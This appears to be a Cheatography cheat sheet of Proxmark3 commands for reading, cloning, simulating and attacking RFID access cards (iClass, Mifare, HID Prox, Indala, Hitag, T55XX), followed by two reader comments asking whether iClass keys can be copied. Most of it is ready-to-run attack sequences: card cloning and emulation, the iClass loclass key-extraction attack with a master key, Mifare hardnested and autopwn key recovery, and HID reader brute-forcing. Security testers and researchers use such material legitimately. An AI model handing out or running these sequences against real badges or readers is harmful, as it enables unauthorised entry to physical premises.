Cheatography
https://cheatography.com
iClass
| Reverse Permute Master Key | hf iclass permute r 3F90EBF0910F7B6F
| Simulate Reader | hf iclass reader
| Dump | hf iclass dump k AFA785A7DAB33378
| Read Block | hf iclass readblk b 7 k AFA785A7DAB33378
| Write to Block | hf iclass writeblk b 07 d 6ce099fe7e614fd0 k AFA785A7DAB33378
| Print Keystore | hf iclass managekeys p
| Add Key to Keystore [0-7] | hf iclass managekeys n 0 k AFA785A7DAB33378
| Encrypt Block | hf iclass encryptblk 0000000f2aa3dba8
| Load Dump | hf iclass eload f iclass_tagdump-filename.bin
| Simulate | hf iclass sim 3
Simulation notes:
0 <CSN> simulate the given CSN
1 simulate default CSN
3 Full simulation using emulator memory
Simulate iClass Sequence
pm3 > hf iclass dump k AFA785A7DAB33378
pm3 > hf iclass eload f iclass_tagdump-db883702f8ff12e0.bin
pm3 > hf iclass sim 3
Clone iClass Legacy Sequence
pm3 > hf iclass readblk b 7 k AFA785A7DAB33378
pm3 > hf iclass writeblk b 07 d 6ce099fe7e614fd0 k AFA785A7DAB33378
iClass loclass attack
Extract custom iClass key (loclass attack)
pm3 > hf iclass sim 2
pm3 > hf iclass loclass f iclass_mac_attack.bin
pm3 > hf iclass dump k <Kcus> e
Verify custom iClass key
pm3 > hf iclass lookup u 010a0ffff7ff12e0 p feffffffffffffff m 66348979153c41b9 f default_iclass_keys.dic e
Generic Commands
| High Frequency Search | hf search
| Low Frequency Search | lf search
| Measure Antenna Characteristics | hw tune
| Check Version | hw version
| Check overall status | hw status
Mifare
| Check for Default Keys | hf mf chk *1 ? d default_keys.dic
| Dump (0=Mini, 1=1k, 2=2k, 4=4k) | hf mf dump 1
| Write to Block | hf mf wrbl 0 A FFFFFFFFFFFF d3a2859f6b880400c801002000000016
| Hardnested Attack | hf mf hardnested 0 A FFFFFFFFFFFF 0 A w
| Load Dump | hf mf eload 353C2AA6
| Simulate | hf mf sim u 353c2aa6
| Run autopwn | hf mf autopwn
Simulate Mifare Sequence
pm3 > hf mf chk *1 ? d default_keys.dic
pm3 > hf mf dump 1
pm3 > script run dumptoemul -i dump.bin
pm3 > hf mf eload 353C2AA6
pm3 > hf mf sim u 353c2aa6
Clone Mifare 1K Sequence
pm3 > hf mf chk *1 ? d default_keys.dic
pm3 > hf mf dump
pm3 > hf mf restore 1 u 4A6CE843 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin
Indala
| Read | lf indala read
| Demodulate | lf indala demod
| Simulate | lf indala sim a0000000c2c436c1
| Clone to T55x7 | lf indala clone a0000000c2c436c1
Lua Scripts
| List Scripts | script list
| Convert .bin to .eml | script run dumptoemul -i filename.bin
| Format Mifare card | script run formatMifare -k FFFFFFFFFFFF -n FFFFFFFFFFFF -x
Options
---
k <key> : the current six byte key
n <key> : the new key
a <access> : the new access bytes
x : execute the commands
HID Prox
| Read | lf hid read
| Demodulate | lf hid demod
| Simulate | lf hid sim 200670012d
| Clone to T5577 | lf hid clone 200670012d
| Convert Site & Facility code to Wiegand | lf hid wiegand 0 56 150
Brute force HID reader
Options
---
a <format> : 26|33|34|35|37|40|44|84
f <FC> : 8-bit value, facility code
c <CN> : (optional) Starting Number, max 65535
d <delay> : delay in ms. Default 1000ms
v : verbose logging, show all tries
---
pm3 > lf hid brute a 26 f 224
pm3 > lf hid brute v a 26 f 21 c 200 d 2000
Raw Data
| Get samples | data samples <size>
| Save samples | data save <filename>
| Load samples | data load <filename>
Hitag
| Read Hitag information | lf hitag info
| Act as Hitag reader | lf hitag reader 26
| Sniff Hitag traffic | lf hitag sniff
| Simulate | lf hitag sim c378181c_a8f7.ht2
| Write to Block | lf hitag writer 24 499602D2 1 00000000
Simulate Hitag2 sequence
pm3 > lf hitag reader 21 56713368
pm3 > lf hitag sim c378181c_a8f7.ht2
T55XX
| Detect T55XX | lf t55xx detect
| Demodulation Config | lf t55xx config FSK
| Write to Block | lf t55xx wr b 0 d 00081040
| Factory Reset Tag | lf t55xx wipe
Modulation Types
<FSK|FSK1|FSK1a|FSK2|FSK2a|ASK|PSK1|PSK2|NRZ|BI|BIa>
EM is ASK
HID Prox is FSK
Indala is PSK
Created By
https://lewys.eu
Comments
Hi there,
I ask about PM3.
In China, PM3 sellers said it is not copying HID iClass key.
But you wrote possible.
So I am confused.
Please tell me: using PM3, is iClass key copying possible?

Hi, I need information.
PM3, is it possible to copy or read/write HID iClass key code?
Sellers said impossible,
so I am confused by wrong information.
Please tell me the correct information.